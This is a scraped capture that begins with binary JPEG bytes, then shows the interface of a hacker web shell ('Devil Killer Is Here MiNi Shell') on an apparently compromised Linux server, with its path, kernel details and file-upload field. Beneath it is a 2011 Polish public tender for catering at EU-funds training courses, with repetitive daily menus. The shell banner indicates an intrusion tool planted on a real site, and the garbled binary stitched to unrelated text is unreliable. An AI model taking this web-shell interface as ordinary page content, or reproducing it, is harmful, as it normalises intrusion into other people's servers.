JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110405/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110405/65860-N-2011.html

<p class="kh_header"><b>Rzeszów: Catering dla Beneficjentów Ostatecznych projektu Akademia funduszy europejskich dla administracji publicznej.</b><br>
<b>Numer ogłoszenia: 65860 - 2011; data zamieszczenia: 05.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rzeszowska Agencja Rozwoju Regionalnego S.A. , ul. Szopena 51, 35-959 Rzeszów, woj. podkarpackie, tel. 017 8520600, 8520610, faks 017 8520611.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rarr.rzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Catering dla Beneficjentów Ostatecznych projektu Akademia funduszy europejskich dla administracji publicznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Catering dla BO AFE
Przygotowanie i dostawa gotowych posiłków, dostawa do Rzeszowa, Jasła, Leżajska, Lubaczowa oraz w inne, różne miejsca w województwie podkarpackim w zależności od miejsca, w którym odbywać się będzie szkolenie.
Specyfikacja usługi zawiera daty oraz ilość osób objętych świadczeniem usługi:
- Data świadczenia usługi od daty zawarcia umowy do 30.11.2011r. 
- zamawiający określi każdorazowo miejsce dostawy posiłków oraz dokładną datę szkolenia.

Wymagane menu na szkolenia wraz z gramaturami posiłków:
a) menu obiadowe - wymagane menu, wszystkie propozycje ze wskazaniem na 
1 osobę - 120 osób - 8 grup x 15 osób, (8 grup tj. 1 grupa w Rzeszowie, 1 grupa w Jaśle, 1 grupa w Leżajsku, 1 grupa w Lubaczowie oraz 4 grupy w innych, różnych miejscach w województwie podkarpackim w zależności od miejsca, w którym odbywać się będzie szkolenie). 

b) menu obiadowe - wymagane menu, wszystkie propozycje ze wskazaniem na 1 osobę (120 osób - 8 grup x 15 osób) 
Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 1
AFE/I/Lubaczów
AFE/I/Leżajsk
Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,
Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 2
AFE/I/Lubaczów
AFE/I/Leżajsk	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 3
AFE/I/Lubaczów
AFE/I/Leżajsk	Zupa pieczarkowa z makaronem 0,25 l,
ziemniaki 150 gr.,
kotlet mielony 150 gr., 
surówka z białej kapusty 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 4
AFE/I/Lubaczów
AFE/I/Leżajsk	Rosół z makaronem 0,25 l,
udko z kurczaka opiekane 150 gr. (250 gr. 
z kością),
ziemniaki 150 gr., 
gotowane warzywa 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 5
AFE/I/Lubaczów
AFE/I/Leżajsk	Zupa grzybowa z makaronem 0,25 l,
Filet z ryby smażony w panierce 150 gr., 
frytki 200 gr.,
surówka z czerwonej kapusty 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 6
AFE/I/Lubaczów
AFE/I/Leżajsk	Zupa jarzynowa 0,25 l,
gulasz z mięsa 150 gr., 
kasza gryczana 200 gr., 
ogórki kwaszone 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 7
AFE/I/Lubaczów
AFE/I/Leżajsk	Bogracz z mięsem 0,25 l (min. 100 gr. mięsa),
Chleb 150 gr.,
naleśniki z serem i dżemem 3 sztuki,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 8
AFE/I/Lubaczów
AFE/I/Leżajsk	Żurek z gotowanym jajkiem (1 szt.) i kiełbasą (50 gr.) 0,25 l,
kluski śląskie min. 5 szt.,
gulasz 150 gr./min. 100 gr. mięsa,
ćwikła z chrzanem 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 9
AFE/I/Lubaczów
AFE/I/Leżajsk	Barszcz czerwony solo 0,25 l,
krokiety z kapustą, mięsem i grzybami 3 szt. (sztuka min. 100 gr.)

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 10
AFE/I/Lubaczów
AFE/I/Leżajsk	Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 11
AFE/I/Lubaczów
AFE/I/Leżajsk	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 12
AFE/I/Lubaczów
AFE/I/Leżajsk	Zupa pieczarkowa z makaronem 0,25 l,
ziemniaki 150 gr.,
kotlet mielony 150 gr., 
surówka z białej kapusty 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 13
AFE/I/Lubaczów
AFE/I/Leżajsk	Rosół z makaronem 0,25 l,
udko z kurczaka opiekane 150 gr. (250 gr. 
z kością),
ziemniaki 150 gr., 
gotowane warzywa 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 14
AFE/I/Lubaczów
AFE/I/Leżajsk	Zupa grzybowa z makaronem 0,25 l,
Filet z ryby smażony w panierce 150 gr., 
frytki 200 gr.,
surówka z czerwonej kapusty 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 15
AFE/I/Lubaczów
AFE/I/Leżajsk	Zupa jarzynowa 0,25 l,
gulasz z mięsa 150 gr., 
kasza gryczana 200 gr., 
ogórki kwaszone 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 16
AFE/I/Lubaczów
AFE/I/Leżajsk	Bogracz z mięsem 0,25 l (min. 100 gr. mięsa),
Chleb 150 gr.,
naleśniki z serem i dżemem 3 sztuki,

--------------------------------------------------------------------------------------------------------------------------------------
Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 1
AFE/I/Rzeszów
AFE/I/Jasło	Żurek z gotowanym jajkiem (1 szt.) i kiełbasą (50 gr.) 0,25 l,
kluski śląskie min. 5 szt.,
gulasz 150 gr./min. 100 gr. mięsa,
ćwikła z chrzanem 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 1
AFE/I/Rzeszów
AFE/I/Jasło	Barszcz czerwony solo 0,25 l,
krokiety z kapustą, mięsem i grzybami 3 szt. (sztuka min. 100 gr.)

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 2
AFE/I/Rzeszów
AFE/I/Jasło	Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 3
AFE/I/Rzeszów
AFE/I/Jasło	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 4
AFE/I/Rzeszów
AFE/I/Jasło	Zupa pieczarkowa z makaronem 0,25 l,
ziemniaki 150 gr.,
kotlet mielony 150 gr., 
surówka z białej kapusty 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 5
AFE/I/Rzeszów
AFE/I/Jasło	Rosół z makaronem 0,25 l,
udko z kurczaka opiekane 150 gr. (250 gr. 
z kością),
ziemniaki 150 gr., 
gotowane warzywa 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 6
AFE/I/Rzeszów
AFE/I/Jasło	Zupa grzybowa z makaronem 0,25 l,
Filet z ryby smażony w panierce 150 gr., 
frytki 200 gr.,
surówka z czerwonej kapusty 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 7
AFE/I/Rzeszów
AFE/I/Jasło	Zupa jarzynowa 0,25 l,
gulasz z mięsa 150 gr., 
kasza gryczana 200 gr., 
ogórki kwaszone 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 8
AFE/I/Rzeszów
AFE/I/Jasło	Bogracz z mięsem 0,25 l (min. 100 gr. mięsa),
Chleb 150 gr.,
naleśniki z serem i dżemem 3 sztuki,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 9
AFE/I/Rzeszów
AFE/I/Jasło	Żurek z gotowanym jajkiem (1 szt.) i kiełbasą (50 gr.) 0,25 l,
kluski śląskie min. 5 szt.,
gulasz 150 gr./min. 100 gr. mięsa,
ćwikła z chrzanem 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 10
AFE/I/Rzeszów
AFE/I/Jasło	Barszcz czerwony solo 0,25 l,
krokiety z kapustą, mięsem i grzybami 3 szt. (sztuka min. 100 gr.)

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 11
AFE/I/Rzeszów
AFE/I/Jasło	Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 12
AFE/I/Rzeszów
AFE/I/Jasło	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 13
AFE/I/Rzeszów
AFE/I/Jasło	Zupa pieczarkowa z makaronem 0,25 l,
ziemniaki 150 gr.,
kotlet mielony 150 gr., 
surówka z białej kapusty 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 14
AFE/I/Rzeszów
AFE/I/Jasło	Rosół z makaronem 0,25 l,
udko z kurczaka opiekane 150 gr. (250 gr. 
z kością),
ziemniaki 150 gr., 
gotowane warzywa 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 15
AFE/I/Rzeszów
AFE/I/Jasło	Zupa grzybowa z makaronem 0,25 l,
Filet z ryby smażony w panierce 150 gr., 
frytki 200 gr.,
surówka z czerwonej kapusty 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 16
AFE/I/Rzeszów
AFE/I/Jasło	Zupa jarzynowa 0,25 l,
gulasz z mięsa 150 gr., 
kasza gryczana 200 gr., 
ogórki kwaszone 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 17
AFE/I/Rzeszów
AFE/I/Jasło	Bogracz z mięsem 0,25 l (min. 100 gr. mięsa),
Chleb 150 gr.,
naleśniki z serem i dżemem 3 sztuki,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 18
AFE/I/Rzeszów
AFE/I/Jasło	Żurek z gotowanym jajkiem (1 szt.) i kiełbasą (50 gr.) 0,25 l,
kluski śląskie min. 5 szt.,
gulasz 150 gr./min. 100 gr. mięsa,
ćwikła z chrzanem 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 19
AFE/I/Rzeszów
AFE/I/Jasło	Barszcz czerwony solo 0,25 l,
krokiety z kapustą, mięsem i grzybami 3 szt. (sztuka min. 100 gr.)

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 20
AFE/I/Rzeszów
AFE/I/Jasło	Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 21
AFE/I/Rzeszów
AFE/I/Jasło	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 22
AFE/I/Rzeszów
AFE/I/Jasło	Zupa pieczarkowa z makaronem 0,25 l,
ziemniaki 150 gr.,
kotlet mielony 150 gr., 
surówka z białej kapusty 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 23
AFE/I/Rzeszów
AFE/I/Jasło	Rosół z makaronem 0,25 l,
udko z kurczaka opiekane 150 gr. (250 gr. 
z kością),
ziemniaki 150 gr., 
gotowane warzywa 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 24
AFE/I/Rzeszów
AFE/I/Jasło	Zupa grzybowa z makaronem 0,25 l,
Filet z ryby smażony w panierce 150 gr., 
frytki 200 gr.,
surówka z czerwonej kapusty 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 25
AFE/I/Rzeszów
AFE/I/Jasło	Zupa jarzynowa 0,25 l,
gulasz z mięsa 150 gr., 
kasza gryczana 200 gr., 
ogórki kwaszone 150 gr.,

Akademia Funduszy Europejskich/Pierwsza edycja/Miejsce przeprowadzenia szkolenia
Dzień 26
AFE/I/Rzeszów
AFE/I/Jasło	Bogracz z mięsem 0,25 l (min. 100 gr. mięsa),
Chleb 150 gr.,
naleśniki z serem i dżemem 3 sztuki,



Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 1
AFE/II/....
AFE/II/....	Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 2
AFE/II/....
AFE/II/....	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 3
AFE/II/....
AFE/II/....	Zupa pieczarkowa z makaronem 0,25 l,
ziemniaki 150 gr.,
kotlet mielony 150 gr., 
surówka z białej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 4
AFE/II/....
AFE/II/....	Rosół z makaronem 0,25 l,
udko z kurczaka opiekane 150 gr. (250 gr. 
z kością),
ziemniaki 150 gr., 
gotowane warzywa 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 5
AFE/II/....
AFE/II/....	Zupa grzybowa z makaronem 0,25 l,
Filet z ryby smażony w panierce 150 gr., 
frytki 200 gr.,
surówka z czerwonej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 6
AFE/II/....
AFE/II/....	Zupa jarzynowa 0,25 l,
gulasz z mięsa 150 gr., 
kasza gryczana 200 gr., 
ogórki kwaszone 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 7
AFE/II/....
AFE/II/....	Bogracz z mięsem 0,25 l (min. 100 gr. mięsa),
Chleb 150 gr.,
naleśniki z serem i dżemem 3 sztuki,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 8
AFE/II/....
AFE/II/....	Żurek z gotowanym jajkiem (1 szt.) i kiełbasą (50 gr.) 0,25 l,
kluski śląskie min. 5 szt.,
gulasz 150 gr./min. 100 gr. mięsa,
ćwikła z chrzanem 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 9
AFE/II/....
AFE/II/....	Barszcz czerwony solo 0,25 l,
krokiety z kapustą, mięsem i grzybami 3 szt. (sztuka min. 100 gr.)

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 10
AFE/II/....
AFE/II/....	Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 11
AFE/II/....
AFE/II/....	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 12
AFE/II/....
AFE/II/....	Zupa pieczarkowa z makaronem 0,25 l,
ziemniaki 150 gr.,
kotlet mielony 150 gr., 
surówka z białej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 13
AFE/II/....
AFE/II/....	Rosół z makaronem 0,25 l,
udko z kurczaka opiekane 150 gr. (250 gr. 
z kością),
ziemniaki 150 gr., 
gotowane warzywa 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 14
AFE/II/....
AFE/II/....	Zupa grzybowa z makaronem 0,25 l,
Filet z ryby smażony w panierce 150 gr., 
frytki 200 gr.,
surówka z czerwonej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 15
AFE/II/....
AFE/II/....	Zupa jarzynowa 0,25 l,
gulasz z mięsa 150 gr., 
kasza gryczana 200 gr., 
ogórki kwaszone 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 16
AFE/II/....
AFE/II/....	Bogracz z mięsem 0,25 l (min. 100 gr. mięsa),
Chleb 150 gr.,
naleśniki z serem i dżemem 3 sztuki,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 17
AFE/II/....
AFE/II/....	Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 18
AFE/II/....
AFE/II/....	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 19
AFE/II/....
AFE/II/....	Zupa pieczarkowa z makaronem 0,25 l,
ziemniaki 150 gr.,
kotlet mielony 150 gr., 
surówka z białej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 20
AFE/II/....
AFE/II/....	Rosół z makaronem 0,25 l,
udko z kurczaka opiekane 150 gr. (250 gr. 
z kością),
ziemniaki 150 gr., 
gotowane warzywa 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 21
AFE/II/....
AFE/II/....	Zupa grzybowa z makaronem 0,25 l,
Filet z ryby smażony w panierce 150 gr., 
frytki 200 gr.,
surówka z czerwonej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 22
AFE/II/....
AFE/II/....	Zupa jarzynowa 0,25 l,
gulasz z mięsa 150 gr., 
kasza gryczana 200 gr., 
ogórki kwaszone 150 gr.,


Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 23
AFE/II/....
AFE/II/....	Bogracz z mięsem 0,25 l (min. 100 gr. mięsa),
Chleb 150 gr.,
naleśniki z serem i dżemem 3 sztuki,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 24
AFE/II/....
AFE/II/....	Żurek z gotowanym jajkiem (1 szt.) i kiełbasą (50 gr.) 0,25 l,
kluski śląskie min. 5 szt.,
gulasz 150 gr./min. 100 gr. mięsa,
ćwikła z chrzanem 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 25
AFE/II/....
AFE/II/....	Żurek z gotowanym jajkiem (1 szt.) i kiełbasą (50 gr.) 0,25 l,
kluski śląskie min. 5 szt.,
gulasz 150 gr./min. 100 gr. mięsa,
ćwikła z chrzanem 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 26
AFE/II/....
AFE/II/....	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,


--------------------------------------------------------------------------------------------------------------------------------------

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 1
AFE/II/....
AFE/II/....	Żurek z gotowanym jajkiem (1 szt.) i kiełbasą (50 gr.) 0,25 l,
kluski śląskie min. 5 szt.,
gulasz 150 gr./min. 100 gr. mięsa,
ćwikła z chrzanem 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 2
AFE/II/....
AFE/II/....	Barszcz czerwony solo 0,25 l,
krokiety z kapustą, mięsem i grzybami 3 szt. (sztuka min. 100 gr.)

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 3
AFE/II/....
AFE/II/....	Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 4
AFE/II/....
AFE/II/....	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,

